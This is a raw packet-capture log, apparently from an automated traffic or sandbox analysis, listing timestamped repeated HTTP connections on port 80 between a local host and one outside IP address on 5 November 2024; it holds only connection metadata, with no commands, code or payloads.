                                                                                            Nov 5, 2024 23:53:37.562047958 CET4999580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:37.562148094 CET4999580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:37.566911936 CET804999537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:37.790030003 CET4999480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:37.795023918 CET804999437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:37.795046091 CET804999437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:37.922621965 CET4999580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:37.927635908 CET804999537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:38.251769066 CET804999437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:38.321024895 CET4999480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:38.323584080 CET804999437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:38.367151022 CET804999537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:38.430413961 CET4999580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:38.448431015 CET804999537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:38.524159908 CET4999480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:38.539767981 CET4999580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:38.565589905 CET4999480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:38.565649986 CET4999580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:38.566231012 CET5000080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:38.570908070 CET804999437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:38.570966005 CET4999480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:38.571003914 CET805000037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:38.571058989 CET5000080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:38.571167946 CET5000080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:38.571603060 CET804999537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:38.571646929 CET4999580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:38.576399088 CET805000037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:38.930572987 CET5000080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:38.935556889 CET805000037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:39.403111935 CET805000037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:39.479218006 CET805000037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:39.479275942 CET5000080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:39.600938082 CET5000080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:39.602025986 CET5000580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:39.606128931 CET805000037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:39.606188059 CET5000080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:39.606908083 CET805000537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:39.606973886 CET5000580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:39.607063055 CET5000580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:39.611864090 CET805000537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:39.961740017 CET5000580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:39.981928110 CET805000537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:40.421107054 CET805000537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:40.496970892 CET805000537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:40.497056007 CET5000580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:40.656383991 CET5000580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:40.661685944 CET805000537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:40.661817074 CET5000580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:40.900326967 CET5001080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:40.905457020 CET805001037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:40.905577898 CET5001080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:40.918225050 CET5001080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:40.923043013 CET805001037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:41.274229050 CET5001080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:41.279088020 CET805001037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:41.716995001 CET805001037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:41.794312954 CET805001037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:41.794374943 CET5001080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:41.913533926 CET5001080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:41.914218903 CET5001580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:41.918757915 CET805001037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:41.918836117 CET5001080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:41.919059038 CET805001537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:41.919125080 CET5001580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:41.923048019 CET5001580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:41.927937031 CET805001537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:42.275177956 CET5001580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:42.280591011 CET805001537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:42.757452965 CET805001537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:42.855514050 CET805001537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:42.859498978 CET5001580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:43.018456936 CET5001580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:43.019257069 CET5002080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:43.023964882 CET805001537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:43.024244070 CET805002037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:43.024305105 CET5001580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:43.024343967 CET5002080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:43.024485111 CET5002080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:43.030642033 CET805002037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:43.373331070 CET5002180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:43.378273010 CET805002137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:43.382050037 CET5002180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:43.384138107 CET5002180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:43.384203911 CET5002080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:43.388926983 CET805002137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:43.389144897 CET805002037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:43.539593935 CET5002080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:43.587274075 CET805002037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:43.614734888 CET805002037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:43.614792109 CET5002080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:43.741252899 CET5002680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:43.742974043 CET5002180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:43.746145010 CET805002637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:43.746215105 CET5002680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:43.746331930 CET5002680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:43.747912884 CET805002137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:43.747960091 CET805002137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:43.752445936 CET805002637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:44.102513075 CET5002680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:44.108671904 CET805002637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:44.202153921 CET805002137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:44.242899895 CET5002180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:44.279257059 CET805002137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:44.430397034 CET5002180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:44.575453997 CET805002637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:44.643115044 CET805002637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:44.643186092 CET5002680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:44.772234917 CET5002180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:44.772722006 CET5002680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:44.773046970 CET5003180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:44.777439117 CET805002137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:44.777997017 CET805003137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:44.778038025 CET5002180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:44.778090000 CET5003180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:44.778173923 CET805002637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:44.778188944 CET5003180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:44.782021046 CET5002680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:44.783020020 CET805003137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:45.133630991 CET5003180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:45.138500929 CET805003137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:45.600760937 CET805003137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:45.677596092 CET805003137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:45.678028107 CET5003180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:46.264446020 CET5003680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:46.269381046 CET805003637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:46.269453049 CET5003680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:46.269557953 CET5003680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:46.274350882 CET805003637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:46.618068933 CET5003680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:46.622991085 CET805003637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:47.092099905 CET805003637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:47.166616917 CET805003637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:47.166757107 CET5003680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:47.288542032 CET5003180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:47.298933983 CET5003680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:47.300087929 CET5004480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:47.304527998 CET805003637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:47.304569960 CET5003680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:47.304924965 CET805004437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:47.304982901 CET5004480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:47.305111885 CET5004480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:47.309906006 CET805004437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:47.649462938 CET5004480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:47.654373884 CET805004437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:48.119100094 CET805004437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:48.195221901 CET805004437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:48.198113918 CET5004480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:48.829246998 CET5004480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:48.834647894 CET805004437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:48.834709883 CET5004480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:48.899744034 CET5005080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:48.904673100 CET805005037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:48.904768944 CET5005080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:48.904880047 CET5005080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:48.909755945 CET805005037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:49.258594990 CET5005080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:49.263626099 CET805005037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:49.291444063 CET5005580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:49.291630030 CET5005080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:49.296462059 CET805005537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:49.296519995 CET5005580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:49.296624899 CET5005580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:49.301498890 CET805005537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:49.339355946 CET805005037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:49.417567968 CET5005680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:49.428246975 CET805005637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:49.428308964 CET5005680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:49.428416014 CET5005680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:49.433188915 CET805005637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:49.496370077 CET805005037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:49.496445894 CET5005080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:49.649305105 CET5005580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:49.654165030 CET805005537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:49.654270887 CET805005537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:49.774255991 CET5005680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:49.779319048 CET805005637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:50.144279957 CET805005537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:50.220345974 CET805005537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:50.222027063 CET5005580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:50.230333090 CET805005637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:50.299886942 CET805005637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:50.299953938 CET5005680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:50.432209969 CET5005580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:50.432238102 CET5005680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:50.433295965 CET5006180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:50.437788963 CET805005537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:50.437820911 CET805005637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:50.437869072 CET5005580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:50.437887907 CET5005680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:50.438117981 CET805006137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:50.440103054 CET5006180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:50.440196991 CET5006180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:50.445024967 CET805006137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:50.790321112 CET5006180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:50.795340061 CET805006137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:51.251265049 CET805006137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:51.330646038 CET805006137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:51.330727100 CET5006180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:51.634126902 CET5006480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:51.639015913 CET805006437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:51.639089108 CET5006480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:51.643795013 CET5006480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:51.648611069 CET805006437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:51.995826006 CET5006480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:52.001395941 CET805006437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:52.482317924 CET805006437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:52.524138927 CET5006480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:52.553010941 CET805006437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:52.602268934 CET5006480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:52.702107906 CET5006480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:52.702713966 CET5007380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:52.710479021 CET805006437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:52.710495949 CET805007337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:52.710566998 CET5006480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:52.710607052 CET5007380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:52.710714102 CET5007380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:52.718854904 CET805007337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:53.055493116 CET5007380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:53.060348988 CET805007337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:53.524394989 CET805007337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:53.601042032 CET805007337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:53.601113081 CET5007380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:53.943442106 CET5007380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:53.944247961 CET5007980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:53.949126005 CET805007937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:53.949234962 CET5007980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:53.949387074 CET5007980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:53.949429035 CET805007337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:53.949484110 CET5007380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:53.954186916 CET805007937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:54.305468082 CET5007980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:54.310400963 CET805007937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:54.751976967 CET805007937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:54.825325012 CET805007937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:54.825475931 CET5007980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:54.944376945 CET5006180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:54.946310997 CET5007980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:54.947074890 CET5008580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:54.951468945 CET805007937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:54.951611996 CET5007980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:54.951910973 CET805008537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:54.951986074 CET5008580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:54.952097893 CET5008580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:54.956906080 CET805008537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:55.228914022 CET5008580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:55.232677937 CET5008780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:55.237612963 CET805008737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:55.237690926 CET5008780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:55.237788916 CET5008780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:55.242539883 CET805008737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:55.275307894 CET805008537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:55.355561972 CET5009080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:55.360480070 CET805009037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:55.360538006 CET5009080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:55.360629082 CET5009080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:55.365442991 CET805009037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:55.528557062 CET805008537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:55.528608084 CET5008580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:55.586916924 CET5008780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:55.591806889 CET805008737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:55.591842890 CET805008737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:55.711711884 CET5009080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:55.716780901 CET805009037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:56.059844017 CET805008737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:56.142760992 CET805008737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:56.143168926 CET5008780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:56.170129061 CET805009037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:56.245335102 CET805009037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:56.246028900 CET5009080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:56.685600042 CET5009080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:56.685604095 CET5008780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:56.690985918 CET805008737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:56.691683054 CET805009037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:56.691761017 CET5008780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:56.691780090 CET5009080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:56.693145037 CET5009680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:56.698261023 CET805009637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:56.702043056 CET5009680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:56.704581022 CET5009680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:56.709517002 CET805009637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:57.055506945 CET5009680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:57.060448885 CET805009637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:57.521550894 CET805009637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:57.600121021 CET805009637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:57.600197077 CET5009680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:57.735848904 CET5009680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:57.738504887 CET5010180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:57.741374969 CET805009637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:57.741506100 CET5009680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:57.743417025 CET805010137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:57.743503094 CET5010180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:57.743838072 CET5010180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:57.748621941 CET805010137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:58.102458000 CET5010180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:58.331046104 CET805010137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:58.559920073 CET805010137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:58.631181955 CET805010137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:58.634017944 CET5010180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:58.760412931 CET5010180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:58.761113882 CET5010280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:58.765564919 CET805010137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:58.765645981 CET5010180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:58.765955925 CET805010237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:58.766042948 CET5010280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:58.766155958 CET5010280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:58.771078110 CET805010237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:59.118102074 CET5010280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:59.123065948 CET805010237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:59.608802080 CET805010237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:59.681221962 CET805010237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:59.684039116 CET5010280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:59.806735039 CET5010280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:59.807414055 CET5010380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:59.812267065 CET805010237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:59.812294960 CET805010337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:59.812345982 CET5010280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:59.812396049 CET5010380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:59.812558889 CET5010380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:59.817320108 CET805010337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:00.164908886 CET5010380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:00.169852972 CET805010337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:00.634643078 CET805010337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:00.703541994 CET805010337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:00.703685999 CET5010380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:00.834536076 CET5010380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:00.835024118 CET5010480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:00.839818954 CET805010437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:00.839889050 CET5010480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:00.840018988 CET5010480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:00.840450048 CET805010337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:00.840498924 CET5010380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:00.845089912 CET805010437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:01.150568008 CET5010580192.168.2.437.44.238.250
